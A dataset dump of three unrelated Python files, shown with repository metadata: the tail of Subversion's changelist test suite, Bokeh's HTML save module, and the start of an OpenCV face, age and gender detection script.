'A/D/H/chi' : Item(verb='Sending'),
'A/D/H/psi' : Item(verb='Sending'),
})
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.tweak('A/mu', 'A/D/G/tau', 'A/D/G/rho',
wc_rev=1, status='M ')
expected_status.tweak('iota', 'A/B/lambda', 'A/B/E/alpha', 'A/B/E/beta',
'A/D/gamma', 'A/D/H/omega', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', wc_rev=2, status=' ')
svntest.actions.run_and_verify_commit(wc_dir,
expected_output,
expected_status,
None,
wc_dir,
"--changelist", "a",
"--changelist", "i")
#----------------------------------------------------------------------
def info_with_changelists(sbox):
"info --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Now, test various combinations of changelist specification and depths.
for clname in [['a'], ['i'], ['a', 'i']]:
for depth in [None, 'files', 'infinity']:
# Figure out what we expect to see in our info output.
expected_paths = []
if 'a' in clname:
if depth == 'infinity':
expected_paths.append('A/B/lambda')
expected_paths.append('A/B/E/alpha')
expected_paths.append('A/B/E/beta')
expected_paths.append('A/D/gamma')
expected_paths.append('A/D/H/omega')
if depth == 'files' or depth == 'infinity':
expected_paths.append('iota')
if 'i' in clname:
if depth == 'infinity':
expected_paths.append('A/D/G/pi')
expected_paths.append('A/D/H/chi')
expected_paths.append('A/D/H/psi')
expected_paths = sorted([os.path.join(wc_dir, x.replace('/', os.sep)) for x in expected_paths])
# Build the command line.
args = ['info', wc_dir]
for cl in clname:
args.append('--changelist')
args.append(cl)
if depth:
args.append('--depth')
args.append(depth)
# Run 'svn info ...'
exit_code, output, errput = svntest.main.run_svn(None, *args)
# Filter the output for lines that begin with 'Path:', and
# reduce even those lines to just the actual path.
paths = sorted([x[6:].rstrip() for x in output if x[:6] == 'Path: '])
# And, compare!
if (paths != expected_paths):
raise svntest.Failure("Expected paths (%s) and actual paths (%s) "
"don't gel" % (str(expected_paths), str(paths)))
#----------------------------------------------------------------------
def diff_with_changelists(sbox):
"diff --changelist (wc-wc and repos-wc)"
sbox.build()
wc_dir = sbox.wc_dir
# Add a line of text to all the versioned files in the tree.
mod_all_files(wc_dir, "New text.\n")
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Now, test various combinations of changelist specification and depths.
for is_repos_wc in [0, 1]:
for clname in [['a'], ['i'], ['a', 'i']]:
for depth in ['files', 'infinity']:
# Figure out what we expect to see in our diff output.
expected_paths = []
if 'a' in clname:
if depth == 'infinity':
expected_paths.append('A/B/lambda')
expected_paths.append('A/B/E/alpha')
expected_paths.append('A/B/E/beta')
expected_paths.append('A/D/gamma')
expected_paths.append('A/D/H/omega')
if depth == 'files' or depth == 'infinity':
expected_paths.append('iota')
if 'i' in clname:
if depth == 'infinity':
expected_paths.append('A/D/G/pi')
expected_paths.append('A/D/H/chi')
expected_paths.append('A/D/H/psi')
expected_paths = sorted([os.path.join(wc_dir, x.replace('/', os.sep)) for x in expected_paths])
# Build the command line.
args = ['diff']
for cl in clname:
args.append('--changelist')
args.append(cl)
if depth:
args.append('--depth')
args.append(depth)
if is_repos_wc:
args.append('--old')
args.append(sbox.repo_url)
args.append('--new')
args.append(sbox.wc_dir)
else:
args.append(wc_dir)
# Run 'svn diff ...'
exit_code, output, errput = svntest.main.run_svn(None, *args)
# Filter the output for lines that begin with 'Index:', and
# reduce even those lines to just the actual path.
paths = sorted([x[7:].rstrip() for x in output if x[:7] == 'Index: '])
# Diff output on Win32 uses '/' path separators.
if sys.platform == 'win32':
paths = [x.replace('/', os.sep) for x in paths]
# And, compare!
if (paths != expected_paths):
raise svntest.Failure("Expected paths (%s) and actual paths (%s) "
"don't gel"
% (str(expected_paths), str(paths)))
#----------------------------------------------------------------------
def propmods_with_changelists(sbox):
"propset/del/get/list --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Set property 'name'='value' on all working copy items.
svntest.main.run_svn(None, "pset", "--depth", "infinity",
"name", "value", wc_dir)
expected_disk = svntest.main.greek_state.copy()
expected_disk.add({'' : Item(props={ 'name' : 'value' })})
expected_disk.tweak('A', 'A/B', 'A/B/E', 'A/B/E/alpha', 'A/B/E/beta',
'A/B/F', 'A/B/lambda', 'A/C', 'A/D', 'A/D/G',
'A/D/G/pi', 'A/D/G/rho', 'A/D/G/tau', 'A/D/H',
'A/D/H/chi', 'A/D/H/omega', 'A/D/H/psi', 'A/D/gamma',
'A/mu', 'iota', props={ 'name' : 'value' })
svntest.actions.verify_disk(wc_dir, expected_disk, True)
# Proplist the 'i' changelist
exit_code, output, errput = svntest.main.run_svn(None, "proplist", "--depth",
"infinity", "--changelist",
"i", wc_dir)
### Really simple sanity check on the output of 'proplist'. If we've got
### a proper proplist content checker anywhere, we should probably use it
### instead.
if len(output) != 6:
raise svntest.Failure
# Remove the 'name' property from files in the 'o' and 'i' changelists.
svntest.main.run_svn(None, "pdel", "--depth", "infinity",
"name", "--changelist", "o", "--changelist", "i",
wc_dir)
expected_disk.tweak('A/D/G/pi', 'A/D/G/rho', 'A/D/H/chi', 'A/D/H/psi',
props={})
svntest.actions.verify_disk(wc_dir, expected_disk, True)
# Add 'foo'='bar' property on all files under A/B to depth files and
# in changelist 'a'.
svntest.main.run_svn(None, "pset", "--depth", "files",
"foo", "bar", "--changelist", "a",
os.path.join(wc_dir, 'A', 'B'))
expected_disk.tweak('A/B/lambda', props={ 'name' : 'value',
'foo' : 'bar' })
svntest.actions.verify_disk(wc_dir, expected_disk, True)
# Add 'bloo'='blarg' property to all files in changelist 'a'.
svntest.main.run_svn(None, "pset", "--depth", "infinity",
"bloo", "blarg", "--changelist", "a",
wc_dir)
expected_disk.tweak('A/B/lambda', props={ 'name' : 'value',
'foo' : 'bar',
'bloo' : 'blarg' })
expected_disk.tweak('A/B/E/alpha', 'A/B/E/beta', 'A/D/H/omega', 'A/D/gamma',
'iota', props={ 'name' : 'value',
'bloo' : 'blarg' })
svntest.actions.verify_disk(wc_dir, expected_disk, True)
# Propget 'name' in files in changelists 'a' and 'i' to depth files.
exit_code, output, errput = svntest.main.run_svn(None, "pget",
"--depth", "files", "name",
"--changelist", "a",
"--changelist", "i",
wc_dir)
verify_pget_output(output, {
os.path.join(wc_dir, 'iota') : 'value',
})
# Propget 'name' in files in changelists 'a' and 'i' to depth infinity.
exit_code, output, errput = svntest.main.run_svn(None, "pget",
"--depth", "infinity",
"name",
"--changelist", "a",
"--changelist", "i",
wc_dir)
verify_pget_output(output, {
os.path.join(wc_dir, 'A', 'D', 'gamma') : 'value',
os.path.join(wc_dir, 'A', 'B', 'E', 'alpha') : 'value',
os.path.join(wc_dir, 'iota') : 'value',
os.path.join(wc_dir, 'A', 'B', 'E', 'beta') : 'value',
os.path.join(wc_dir, 'A', 'B', 'lambda') : 'value',
os.path.join(wc_dir, 'A', 'D', 'H', 'omega') : 'value',
})
#----------------------------------------------------------------------
def revert_with_changelists(sbox):
"revert --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Add a line of text to all the versioned files in the tree.
mod_all_files(wc_dir, "Please, oh please, revert me!\n")
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.tweak('A/B/lambda', 'A/B/E/alpha', 'A/B/E/beta',
'A/D/gamma', 'A/D/H/omega', 'iota', 'A/mu',
'A/D/G/tau', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', 'A/D/G/rho', status='M ')
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --changelist a WC_DIR' (without depth, no change expected)
svntest.main.run_svn(None, "revert", "--changelist", "a", wc_dir)
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --changelist o --depth files WC_DIR WC_DIR/A/B' (no change)
svntest.main.run_svn(None, "revert", "--depth", "files",
"--changelist", "o",
wc_dir, os.path.join(wc_dir, 'A', 'B'))
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --changelist a --depth files WC_DIR WC_DIR/A/B'
# (iota, lambda reverted)
svntest.main.run_svn(None, "revert", "--depth", "files",
"--changelist", "a",
wc_dir, os.path.join(wc_dir, 'A', 'B'))
expected_status.tweak('iota', 'A/B/lambda', status=' ')
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --changelist a --changelist i --depth infinity WC_DIR'
# (alpha, beta, gamma, omega, pi, chi, psi reverted)
svntest.main.run_svn(None, "revert", "--depth", "infinity",
"--changelist", "a", "--changelist", "i",
wc_dir)
expected_status.tweak('A/B/E/alpha', 'A/B/E/beta', 'A/D/gamma',
'A/D/H/omega', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', status=' ')
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --depth infinity WC_DIR' (back to pristine-ness)
svntest.main.run_svn(None, "revert", "--depth", "infinity",
wc_dir)
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
svntest.actions.run_and_verify_status(wc_dir, expected_status)
#----------------------------------------------------------------------
def update_with_changelists(sbox):
"update --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add a line of text to all the versioned files in the tree, commit, update.
mod_all_files(wc_dir, "Added line.\n")
svntest.main.run_svn(None, "commit", "-m", "logmsg", wc_dir)
svntest.main.run_svn(None, "update", wc_dir)
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
### Backdate only the files in the 'a' and 'i' changelists at depth
### files under WC_DIR and WC_DIR/A/B.
# We expect update to only touch lambda and iota.
expected_output = svntest.wc.State(wc_dir, {
'A/B/lambda' : Item(status='U '),
'iota' : Item(status='U '),
})
# Disk state should have all the files except iota and lambda
# carrying new text.
expected_disk = svntest.main.greek_state.copy()
expected_disk.tweak('A/B/E/alpha',
contents="This is the file 'alpha'.\nAdded line.\n")
expected_disk.tweak('A/B/E/beta',
contents="This is the file 'beta'.\nAdded line.\n")
expected_disk.tweak('A/D/gamma',
contents="This is the file 'gamma'.\nAdded line.\n")
expected_disk.tweak('A/D/H/omega',
contents="This is the file 'omega'.\nAdded line.\n")
expected_disk.tweak('A/mu',
contents="This is the file 'mu'.\nAdded line.\n")
expected_disk.tweak('A/D/G/tau',
contents="This is the file 'tau'.\nAdded line.\n")
expected_disk.tweak('A/D/G/pi',
contents="This is the file 'pi'.\nAdded line.\n")
expected_disk.tweak('A/D/H/chi',
contents="This is the file 'chi'.\nAdded line.\n")
expected_disk.tweak('A/D/H/psi',
contents="This is the file 'psi'.\nAdded line.\n")
expected_disk.tweak('A/D/G/rho',
contents="This is the file 'rho'.\nAdded line.\n")
# Status is clean, but with iota and lambda at r1 and all else at r2.
expected_status = svntest.actions.get_virginal_state(wc_dir, 2)
expected_status.tweak('iota', 'A/B/lambda', wc_rev=1)
# Update.
svntest.actions.run_and_verify_update(wc_dir,
expected_output,
expected_disk,
expected_status,
None, None, None,
None, None, 1,
"-r", "1",
"--changelist", "a",
"--changelist", "i",
"--depth", "files",
wc_dir,
os.path.join(wc_dir, 'A', 'B'))
### Backdate to depth infinity all changelists "a", "i", and "o" now.
# We expect update to only touch all the files ending in 'a', 'i',
# and 'o' (except lambda and iota which were previously updated).
expected_output = svntest.wc.State(wc_dir, {
'A/D/G/pi' : Item(status='U '),
'A/D/H/chi' : Item(status='U '),
'A/D/H/psi' : Item(status='U '),
'A/D/G/rho' : Item(status='U '),
'A/B/E/alpha' : Item(status='U '),
'A/B/E/beta' : Item(status='U '),
'A/D/gamma' : Item(status='U '),
'A/D/H/omega' : Item(status='U '),
})
# Disk state should have only tau and mu carrying new text.
expected_disk = svntest.main.greek_state.copy()
expected_disk.tweak('A/mu',
contents="This is the file 'mu'.\nAdded line.\n")
expected_disk.tweak('A/D/G/tau',
contents="This is the file 'tau'.\nAdded line.\n")
# Status is clean, but with iota and lambda at r1 and all else at r2.
expected_status = svntest.actions.get_virginal_state(wc_dir, 2)
expected_status.tweak('iota', 'A/B/lambda', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', 'A/D/G/rho', 'A/B/E/alpha',
'A/B/E/beta', 'A/D/gamma', 'A/D/H/omega', wc_rev=1)
# Update.
svntest.actions.run_and_verify_update(wc_dir,
expected_output,
expected_disk,
expected_status,
None, None, None,
None, None, 1,
"-r", "1",
"--changelist", "a",
"--changelist", "i",
"--changelist", "o",
"--depth", "infinity",
wc_dir)
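# For reference, the two updates above correspond roughly to these command lines
# (a sketch; WC_DIR stands for the working copy root):
#   svn update -r1 --changelist a --changelist i --depth files WC_DIR WC_DIR/A/B
#   svn update -r1 --changelist a --changelist i --changelist o --depth infinity WC_DIR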
def tree_conflicts_and_changelists_on_commit1(sbox):
"tree conflicts, changelists and commit"
svntest.actions.build_greek_tree_conflicts(sbox)
wc_dir = sbox.wc_dir
iota = os.path.join(wc_dir, "iota")
rho = os.path.join(wc_dir, "A", "D", "G", "rho")
# This file will ultimately be committed
svntest.main.file_append(iota, "More stuff in iota")
# Verify that the commit is blocked when we include a tree-conflicted
# item.
svntest.main.run_svn(None, "changelist", "list", iota, rho)
expected_error = ("svn: E155015: Aborting commit: '.*" + re.escape(rho)
+ "' remains in .*conflict")
svntest.actions.run_and_verify_commit(wc_dir,
None, None,
expected_error,
wc_dir,
"--changelist",
"list")
# Now, test if we can commit iota without those tree-conflicts
# getting in the way.
svntest.main.run_svn(None, "changelist", "--remove", rho)
expected_output = svntest.wc.State(wc_dir, {
'iota' : Item(verb='Sending'),
})
expected_status = svntest.actions.get_virginal_state(wc_dir, 2)
expected_status.tweak('A/D/G/pi', status='D ', treeconflict='C')
expected_status.tweak('A/D/G/tau', status='! ', treeconflict='C',
wc_rev=None)
expected_status.tweak('A/D/G/rho', status='A ', copied='+',
treeconflict='C', wc_rev='-')
expected_status.tweak('iota', wc_rev=3, status=' ')
svntest.actions.run_and_verify_commit(wc_dir,
expected_output,
expected_status,
None,
wc_dir,
"--changelist",
"list")
def tree_conflicts_and_changelists_on_commit2(sbox):
"more tree conflicts, changelists and commit"
sbox.build()
wc_dir = sbox.wc_dir
iota = os.path.join(wc_dir, "iota")
A = os.path.join(wc_dir, "A",)
C = os.path.join(A, "C")
# Make a tree-conflict on A/C:
# Remove it, warp back, add a prop, update.
svntest.main.run_svn(None, 'delete', C)
expected_output = svntest.verify.RegexOutput(
"Deleting.*" + re.escape(C),
False)
svntest.actions.run_and_verify_svn(None, expected_output, [],
'commit', '-m', 'delete A/C', C)
expected_output = svntest.verify.RegexOutput(
"A.*" + re.escape(C), False)
svntest.actions.run_and_verify_svn(None, expected_output, [],
'update', C, "-r1")
expected_output = svntest.verify.RegexOutput(
".*'propname' set on '"
+ re.escape(C) + "'", False)
svntest.actions.run_and_verify_svn(None, expected_output, [],
'propset', 'propname', 'propval', C)
expected_output = svntest.verify.RegexOutput(
" C " + re.escape(C), False)
svntest.actions.run_and_verify_svn(None, expected_output, [],
'update', wc_dir)
expected_status = svntest.actions.get_virginal_state(wc_dir, 2)
expected_status.tweak('A/C', status='A ', copied='+',
treeconflict='C', wc_rev='-')
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# So far so good. We have a tree-conflict on an absent dir A/C.
# Verify that the current situation does not commit.
  expected_error = "svn: E155015: Aborting commit:.* remains in .*conflict"
svntest.actions.run_and_verify_commit(wc_dir,
None, None,
expected_error,
wc_dir)
# Now try to commit with a changelist, not letting the
# tree-conflict get in the way.
svntest.main.file_append(iota, "More stuff in iota")
svntest.main.run_svn(None, "changelist", "list", iota)
expected_output = svntest.wc.State(wc_dir, {
'iota' : Item(verb='Sending'),
})
expected_status.tweak('iota', wc_rev=3, status=' ')
svntest.actions.run_and_verify_commit(wc_dir,
expected_output,
expected_status,
None,
wc_dir,
"--changelist",
"list")
#----------------------------------------------------------------------
def move_keeps_changelist(sbox):
"'svn mv' of existing keeps the changelist"
sbox.build(read_only = True)
wc_dir = sbox.wc_dir
iota_path = os.path.join(wc_dir, 'iota')
iota2_path = iota_path + '2'
# 'svn mv' of existing file should *copy* the changelist to the new place
svntest.main.run_svn(None, "changelist", 'foo', iota_path)
svntest.main.run_svn(None, "rename", iota_path, iota2_path)
expected_infos = [
{
'Name' : 'iota',
'Schedule' : 'delete',
'Changelist' : 'foo',
},
{
'Name' : 'iota2',
'Schedule' : 'add',
'Changelist' : 'foo', # this line fails the test
},
]
svntest.actions.run_and_verify_info(expected_infos, iota_path, iota2_path)
def move_added_keeps_changelist(sbox):
"'svn mv' of added keeps the changelist"
sbox.build(read_only = True)
wc_dir = sbox.wc_dir
repo_url = sbox.repo_url
kappa_path = os.path.join(wc_dir, 'kappa')
kappa2_path = kappa_path + '2'
# add 'kappa' (do not commit!)
svntest.main.file_write(kappa_path, "This is the file 'kappa'.\n")
svntest.main.run_svn(None, 'add', kappa_path)
# 'svn mv' of added file should *move* the changelist to the new place
svntest.main.run_svn(None, "changelist", 'foo', kappa_path)
svntest.main.run_svn(None, "rename", kappa_path, kappa2_path)
# kappa not under version control
svntest.actions.run_and_verify_svnversion(None, kappa_path, repo_url,
[], ".*doesn't exist.*")
# kappa2 in a changelist
expected_infos = [
{
'Name' : 'kappa2',
'Schedule' : 'add',
'Changelist' : 'foo', # this line fails the test
},
]
svntest.actions.run_and_verify_info(expected_infos, kappa2_path)
@Issue(3820)
def change_to_dir(sbox):
"change file in changelist to dir"
sbox.build()
# No changelist initially
expected_infos = [{'Name' : 'mu', 'Changelist' : None}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu visible in changelist
svntest.actions.run_and_verify_svn(None, None, [],
'changelist', 'qq', sbox.ospath('A/mu'))
expected_infos = [{'Name' : 'mu', 'Changelist' : 'qq'}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after delete
svntest.actions.run_and_verify_svn(None, None, [], 'rm', sbox.ospath('A/mu'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu removed from changelist after replace with directory
svntest.actions.run_and_verify_svn(None, '^A|' + _re_cl_rem_pattern, [],
'mkdir', sbox.ospath('A/mu'))
expected_infos = [{'Changelist' : None}] # No Name for directories?
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
svntest.main.run_svn(None, "commit", "-m", "r2: replace A/mu: file->dir",
sbox.ospath('A'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
svntest.main.run_svn(None, "update", "-r", "1", sbox.ospath('A'))
expected_infos = [{'Name' : 'mu', 'Changelist' : None}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu visible in changelist
svntest.actions.run_and_verify_svn(None, None, [],
'changelist', 'qq', sbox.ospath('A/mu'))
expected_infos = [{'Name' : 'mu', 'Changelist' : 'qq'}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu removed from changelist after replace with dir via merge
svntest.main.run_svn(None, "merge", "-c", "2", sbox.ospath('A'),
sbox.ospath('A'))
expected_infos = [{'Changelist' : None}] # No Name for directories?
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
@Issue(3822)
def revert_deleted_in_changelist(sbox):
"revert a deleted file in a changelist"
sbox.build(read_only = True)
# No changelist initially
expected_infos = [{'Name' : 'mu', 'Changelist' : None}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu visible in changelist
svntest.actions.run_and_verify_svn(None, None, [],
'changelist', 'qq', sbox.ospath('A/mu'))
expected_infos = [{'Name' : 'mu', 'Changelist' : 'qq'}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after delete
svntest.actions.run_and_verify_svn(None, None, [], 'rm', sbox.ospath('A/mu'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after revert
svntest.actions.run_and_verify_svn(None, None, [],
'revert', sbox.ospath('A/mu'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after parent delete
svntest.actions.run_and_verify_svn(None, None, [], 'rm', sbox.ospath('A'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after revert
svntest.actions.run_and_verify_svn(None, None, [],
'revert', '-R', sbox.ospath('A'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
def add_remove_non_existent_target(sbox):
"add and remove non-existent target to changelist"
sbox.build(read_only = True)
wc_dir = sbox.wc_dir
bogus_path = os.path.join(wc_dir, 'A', 'bogus')
expected_err = "svn: warning: W155010: The node '" + \
re.escape(os.path.abspath(bogus_path)) + \
"' was not found"
svntest.actions.run_and_verify_svn(None, None, expected_err,
'changelist', 'testlist',
bogus_path)
svntest.actions.run_and_verify_svn(None, None, expected_err,
'changelist', bogus_path,
'--remove')
def add_remove_unversioned_target(sbox):
"add and remove unversioned target to changelist"
sbox.build(read_only = True)
unversioned = sbox.ospath('unversioned')
svntest.main.file_write(unversioned, "dummy contents", 'w+')
expected_err = "svn: warning: W155010: The node '" + \
re.escape(os.path.abspath(unversioned)) + \
"' was not found"
svntest.actions.run_and_verify_svn(None, None, expected_err,
'changelist', 'testlist',
unversioned)
svntest.actions.run_and_verify_svn(None, None, expected_err,
'changelist', unversioned,
'--remove')
@Issue(3985)
def readd_after_revert(sbox):
"add new file to changelist, revert and readd"
sbox.build(read_only = True)
dummy = sbox.ospath('dummy')
svntest.main.file_write(dummy, "dummy contents")
sbox.simple_add('dummy')
svntest.actions.run_and_verify_svn(None, None, [],
'changelist', 'testlist',
dummy)
sbox.simple_revert('dummy')
svntest.main.file_write(dummy, "dummy contents")
svntest.actions.run_and_verify_svn(None, None, [],
'add', dummy)
########################################################################
# Run the tests
# list all tests here, starting with None:
test_list = [ None,
add_remove_changelists,
commit_one_changelist,
commit_multiple_changelists,
info_with_changelists,
diff_with_changelists,
propmods_with_changelists,
revert_with_changelists,
update_with_changelists,
tree_conflicts_and_changelists_on_commit1,
tree_conflicts_and_changelists_on_commit2,
move_keeps_changelist,
move_added_keeps_changelist,
change_to_dir,
revert_deleted_in_changelist,
add_remove_non_existent_target,
add_remove_unversioned_target,
readd_after_revert,
]
if __name__ == '__main__':
svntest.main.run_tests(test_list)
# NOTREACHED
### End of file.
| 39.102796
| 103
| 0.552272
|
1968c874a142a149b26c744ef8143c12ce2dcee4
| 6,216
|
py
|
Python
|
bokeh/io/saving.py
|
snjypl/bokeh
|
c2467ee201b4516301f2893bdf7ec2c21b877a9a
|
[
"BSD-3-Clause"
] | 1
|
2021-06-03T13:13:21.000Z
|
2021-06-03T13:13:21.000Z
|
bokeh/io/saving.py
|
snjypl/bokeh
|
c2467ee201b4516301f2893bdf7ec2c21b877a9a
|
[
"BSD-3-Clause"
] | null | null | null |
bokeh/io/saving.py
|
snjypl/bokeh
|
c2467ee201b4516301f2893bdf7ec2c21b877a9a
|
[
"BSD-3-Clause"
] | null | null | null |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from os.path import abspath
from typing import Optional, Tuple
from warnings import warn
# External imports
from jinja2 import Template
# Bokeh imports
from ..core.templates import FILE
from ..core.types import PathLike
from ..models.layouts import LayoutDOM
from ..resources import Resources, ResourcesLike
from ..settings import settings
from ..themes import Theme
from .state import State, curstate
from .util import default_filename
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
DEFAULT_TITLE = "Bokeh Plot"
__all__ = (
'save',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def save(obj: LayoutDOM, filename: Optional[PathLike] = None, resources: Optional[ResourcesLike] = None,
title: Optional[str] = None, template: Optional[Template] = None, state: Optional[State] = None) -> str:
''' Save an HTML file with the data for the current document.
Will fall back to the default output state (or an explicitly provided
:class:`State` object) for ``filename``, ``resources``, or ``title`` if they
are not provided. If the filename is not given and not provided via output state,
it is derived from the script name (e.g. ``/foo/myplot.py`` will create
``/foo/myplot.html``)
Args:
obj (LayoutDOM object) : a Layout (Row/Column), Plot or Widget object to display
filename (PathLike, e.g. str, Path, optional) : filename to save document under (default: None)
If None, use the default state configuration.
resources (Resources or ResourcesMode, optional) : A Resources config to use (default: None)
            If None, use the default state configuration, if there is one;
            otherwise fall back to the resources configured in Bokeh settings (CDN by default).
title (str, optional) : a title for the HTML document (default: None)
If None, use the default state title value, if there is one.
Otherwise, use "Bokeh Plot"
template (Template, optional) : HTML document template (default: FILE)
A Jinja2 Template, see bokeh.core.templates.FILE for the required template
parameters
state (State, optional) :
A :class:`State` object. If None, then the current default
implicit state is used. (default: None).
Returns:
str: the filename where the HTML file is saved.
'''
if state is None:
state = curstate()
theme = state.document.theme
filename, resources, title = _get_save_args(state, filename, resources, title)
_save_helper(obj, filename, resources, title, template, theme)
return abspath(filename)
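# A minimal usage sketch (not part of this module); ``figure`` is assumed to come
# from ``bokeh.plotting``:
#
#     from bokeh.plotting import figure
#     from bokeh.io import save
#
#     p = figure(title="demo")
#     p.line([1, 2, 3], [4, 6, 5])
#     save(p, filename="demo.html", title="demo")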
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
def _get_save_args(state: State, filename: Optional[PathLike], resources: Optional[ResourcesLike],
title: Optional[str]) -> Tuple[PathLike, Resources, str]:
'''
'''
filename, is_default_filename = _get_save_filename(state, filename)
resources = _get_save_resources(state, resources, is_default_filename)
title = _get_save_title(state, title, is_default_filename)
return filename, resources, title
def _get_save_filename(state: State, filename: Optional[PathLike]) -> Tuple[PathLike, bool]:
if filename is not None:
return filename, False
if state.file and not settings.ignore_filename():
return state.file.filename, False
return default_filename("html"), True
def _get_save_resources(state: State, resources: Optional[ResourcesLike], suppress_warning: bool) -> Resources:
if resources is not None:
if isinstance(resources, Resources):
return resources
else:
return Resources(mode=resources)
if state.file:
return state.file.resources
if not suppress_warning:
warn("save() called but no resources were supplied and output_file(...) was never called, defaulting to resources.CDN")
return Resources(mode=settings.resources())
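# Resolution order used above: an explicit ``resources`` argument wins, then any
# resources recorded by ``output_file(...)`` on the current state, and finally the
# mode from Bokeh settings (with a warning), which is CDN by default.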
def _get_save_title(state: State, title: Optional[str], suppress_warning: bool) -> str:
if title is not None:
return title
if state.file:
return state.file.title
if not suppress_warning:
warn("save() called but no title was supplied and output_file(...) was never called, using default title 'Bokeh Plot'")
return DEFAULT_TITLE
def _save_helper(obj: LayoutDOM, filename: PathLike, resources: Optional[Resources],
title: Optional[str], template: Optional[Template], theme: Optional[Theme] = None) -> None:
'''
'''
from ..embed import file_html
html = file_html(obj, resources, title=title, template=template or FILE, theme=theme)
with open(filename, mode="w", encoding="utf-8") as f:
f.write(html)
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| 36.139535
| 127
| 0.552124
|
3d367cbc4a8d1de3175240ab89f141eaf7acc744
| 2,903
|
py
|
Python
|
detect.py
|
saurabhpatel7/Age-Gender_Detection
|
c95e76b500d7ba7ceaa9830c5e0fe37799d614f1
|
[
"MIT"
] | null | null | null |
detect.py
|
saurabhpatel7/Age-Gender_Detection
|
c95e76b500d7ba7ceaa9830c5e0fe37799d614f1
|
[
"MIT"
] | null | null | null |
detect.py
|
saurabhpatel7/Age-Gender_Detection
|
c95e76b500d7ba7ceaa9830c5e0fe37799d614f1
|
[
"MIT"
] | null | null | null |
import cv2
import math
import argparse
def highlightFace(net, frame, conf_threshold=0.7):
frameOpencvDnn = frame.copy()
frameHeight = frameOpencvDnn.shape[0]
frameWidth = frameOpencvDnn.shape[1]
blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)
net.setInput(blob)
detections = net.forward()
faceBoxes = []
for i in range(detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > conf_threshold:
x1 = int(detections[0, 0, i, 3] * frameWidth)
y1 = int(detections[0, 0, i, 4] * frameHeight)
x2 = int(detections[0, 0, i, 5] * frameWidth)
y2 = int(detections[0, 0, i, 6] * frameHeight)
faceBoxes.append([x1, y1, x2, y2])
cv2.rectangle(frameOpencvDnn, (x1, y1), (x2, y2), (0, 255, 0), int(round(frameHeight / 150)), 8)
return frameOpencvDnn, faceBoxes
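# highlightFace() above runs the OpenCV DNN face detector on a 300x300 blob of the
# frame, keeps detections above conf_threshold, draws green rectangles on a copy of
# the frame, and returns that annotated copy together with the detected box
# coordinates.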
parser = argparse.ArgumentParser()
parser.add_argument('--image')
args = parser.parse_args()
faceProto = "opencv_face_detector.pbtxt"
faceModel = "opencv_face_detector_uint8.pb"
ageProto = "age_deploy.prototxt"
ageModel = "age_net.caffemodel"
genderProto = "gender_deploy.prototxt"
genderModel = "gender_net.caffemodel"
MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
ageList = ['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']
genderList = ['Male', 'Female']
faceNet = cv2.dnn.readNet(faceModel, faceProto)
ageNet = cv2.dnn.readNet(ageModel, ageProto)
